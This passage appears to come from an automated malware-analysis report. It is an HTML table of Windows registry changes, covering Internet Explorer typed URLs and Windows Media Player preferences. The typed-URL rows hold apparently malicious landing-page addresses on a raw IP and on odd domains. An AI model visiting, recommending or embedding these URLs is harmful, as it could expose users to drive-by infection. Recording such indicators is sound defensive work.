<td><span style="color: black; font-size: xx-small;">CleanCookies</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing</span></td>
<td><span style="color: black; font-size: xx-small;">NewTabPageShowClosedTabs</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing</span></td>
<td><span style="color: black; font-size: xx-small;">NewTabPageShowActivities</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\CommandBar</span></td>
<td><span style="color: black; font-size: xx-small;">CompatibilityViewButtonBalloonCount</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000002</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Recovery\Active</span></td>
<td><span style="color: black; font-size: xx-small;">{8CFA7582-04D2-11E2-A16C-08002765500A}</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Recovery\Active</span></td>
<td><span style="color: black; font-size: xx-small;">{E4F1361D-04D0-11E2-A16B-08002765500A}</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs</span></td>
<td><span style="color: black; font-size: xx-small;">url1</span></td>
<td><span style="color: black; font-size: xx-small;">"http://www.google.com/"</span></td>
<td><span style="color: black; font-size: xx-small;">"http://46.249.59.116/main.php?page=5a56c997ffff2f79"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs</span></td>
<td><span style="color: black; font-size: xx-small;">url2</span></td>
<td><span style="color: black; font-size: xx-small;">"http://google.com/"</span></td>
<td><span style="color: black; font-size: xx-small;">"http://www.google.com/"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs</span></td>
<td><span style="color: black; font-size: xx-small;">url3</span></td>
<td><span style="color: black; font-size: xx-small;">"http://koqjhmmhcm.byinter.net/main.php?page=c9ee61ed42809775"</span></td>
<td><span style="color: black; font-size: xx-small;">"http://ns8.ns360.info/main.php?page=f61d19dee2176c62"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs</span></td>
<td><span style="color: black; font-size: xx-small;">url4</span></td>
<td><span style="color: black; font-size: xx-small;">"http://urlquery.net/"</span></td>
<td><span style="color: black; font-size: xx-small;">"http://koqjhmmhcm.byinter.net/main.php?page=c9ee61ed42809775"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs</span></td>
<td><span style="color: black; font-size: xx-small;">url5</span></td>
<td><span style="color: black; font-size: xx-small;">"http://search.live.com/results.aspx?q=download+wireshark&src=IE-SearchBox&Form=IE8SRC"</span></td>
<td><span style="color: black; font-size: xx-small;">"http://urlquery.net/"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs</span></td>
<td><span style="color: black; font-size: xx-small;">url6</span></td>
<td><span style="color: black; font-size: xx-small;">"http://www.oldversion.com/download.php?version=%2Fdownload-Java-Platform-Java-6-Update-29.html"</span></td>
<td><span style="color: black; font-size: xx-small;">"http://google.com/"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs</span></td>
<td><span style="color: black; font-size: xx-small;">url7</span></td>
<td><span style="color: black; font-size: xx-small;">"http://oldversion.com/"</span></td>
<td><span style="color: black; font-size: xx-small;">"http://search.live.com/results.aspx?q=download+wireshark&src=IE-SearchBox&Form=IE8SRC"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs</span></td>
<td><span style="color: black; font-size: xx-small;">url8</span></td>
<td><span style="color: black; font-size: xx-small;">"http://go.microsoft.com/fwlink/?LinkId=69157"</span></td>
<td><span style="color: black; font-size: xx-small;">"http://www.oldversion.com/download.php?version=%2Fdownload-Java-Platform-Java-6-Update-29.html"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs</span></td>
<td><span style="color: black; font-size: xx-small;">url9</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"http://oldversion.com/"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs</span></td>
<td><span style="color: black; font-size: xx-small;">url10</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"http://go.microsoft.com/fwlink/?LinkId=69157"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\DropDown</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Health</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{0890F930-4F80-4646-BAB1-4B6E5571FB89}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{1F32514F-1561-4922-A604-8A1F478B5A42}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{52903d79-f993-4de6-8317-20c9c176d823}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{59E7BF52-E5C9-4382-A39A-522DEE9AFDFD}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{5DF031B7-6A37-42D9-8802-E27F4F224332}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{5DF031B7-6A37-42D9-8802-E27F4F224332}</span></td>
<td><span style="color: black; font-size: xx-small;">AttemptedAutoRun</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{5F4BB5C9-4652-489B-8601-EEC0C3C32E2E}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{7F2B1D6B-1357-402C-A1C8-67E59583B41D}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{93075F62-16B3-43EC-A53B-FFAD0E01D5E7}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{9695AEF9-9D03-4671-8F2F-FF49D1BB01C4}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{9695AEF9-9D03-4671-8F2F-FF49D1BB01C4}</span></td>
<td><span style="color: black; font-size: xx-small;">AttemptedAutoRun</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{976ABECA-93F7-4d81-9187-2A6137829675}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{99DB05E3-F81E-4C8A-A252-F396306AB6FE}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{9F9562EB-15B6-46C6-A7CB-0A66FC65130E}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{9FA014E3-076F-4865-A73C-117131B8E292}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{D5E49195-ED19-40fb-9EE0-E6625A808B77}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{E641D09E-E500-4c09-8260-F1CD7B902E9C}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{F24A1BC2-2331-4B91-8A13-5A549DA56E9D}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{FD981763-B6BB-4d51-9143-6D372A0ED56F}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\MediaLibrarySettings</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Skins</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Skins\res://wmploc/RT_TEXT/MainAppSkin.wsz</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Skins\res://wmploc/RT_TEXT/MainAppSkin.wsz</span></td>
<td><span style="color: black; font-size: xx-small;">Prefs</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"mute;False"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Tasks</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying</span></td>
<td><span style="color: black; font-size: xx-small;">InitFlags</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying</span></td>
<td><span style="color: black; font-size: xx-small;">ShowHorizontalSeparator</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying</span></td>
<td><span style="color: black; font-size: xx-small;">ShowVerticalSeparator</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying</span></td>
<td><span style="color: black; font-size: xx-small;">PlaylistWidth</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:000000ba</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying</span></td>
<td><span style="color: black; font-size: xx-small;">PlaylistHeight</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000064</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying</span></td>
<td><span style="color: black; font-size: xx-small;">SettingsWidth</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000064</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying</span></td>
<td><span style="color: black; font-size: xx-small;">SettingsHeight</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000087</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying</span></td>
<td><span style="color: black; font-size: xx-small;">MetadataWidth</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:000000ba</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying</span></td>
<td><span style="color: black; font-size: xx-small;">MetadataHeight</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:000000a0</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying</span></td>
<td><span style="color: black; font-size: xx-small;">CaptionsHeight</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000064</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Settings</span></td>
<td><span style="color: black; font-size: xx-small;">Client ID</span></td>
<td><span style="color: black; font-size: xx-small;">"{43209BE6-BD53-40A7-9DD3-50364635A3E4}"</span></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">AcceptedPrivacyStatement</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">MetadataRetrieval</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000003</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">SendUserGUID</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">hex:00,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">SilentAcquisition</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">UsageTracking</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">DisableMRU</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">LaunchIndex</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000002</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">AppColorLimited</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">FirstRun</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">X</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"10"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">Y</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"10"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">Width</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"686"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">Height</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"536"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">Maximized</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"0"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">Volume</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000032</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">ModeShuffle</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">ModeLoop</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">Mute</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">Balance</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">CurrentEffectType</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Battery"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">CurrentEffectPreset</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">VideoZoom</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000064</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">ShrinkToFit</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">ShowEffects</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">ShowFullScreenPlaylist</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">NowPlayingQuickHide</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">ShowTitles</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">ShowCaptions</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">NowPlayingPlaylist</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">NowPlayingMetadata</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">NowPlayingSettings</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">VizAutoSelect</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">CurrentDisplayView</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"VizView"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">CurrentSettingsView</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"EQView"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">CurrentMetadataView</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"MediaInfoView"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">CurrentDisplayPreset</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">CurrentSettingsPreset</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">CurrentMetadataPreset</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">UserDisplayView</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"VizView"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">UserWMPDisplayView</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"VizView"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">UserWMPSettingsView</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"EQView"</span></td>
</tr>
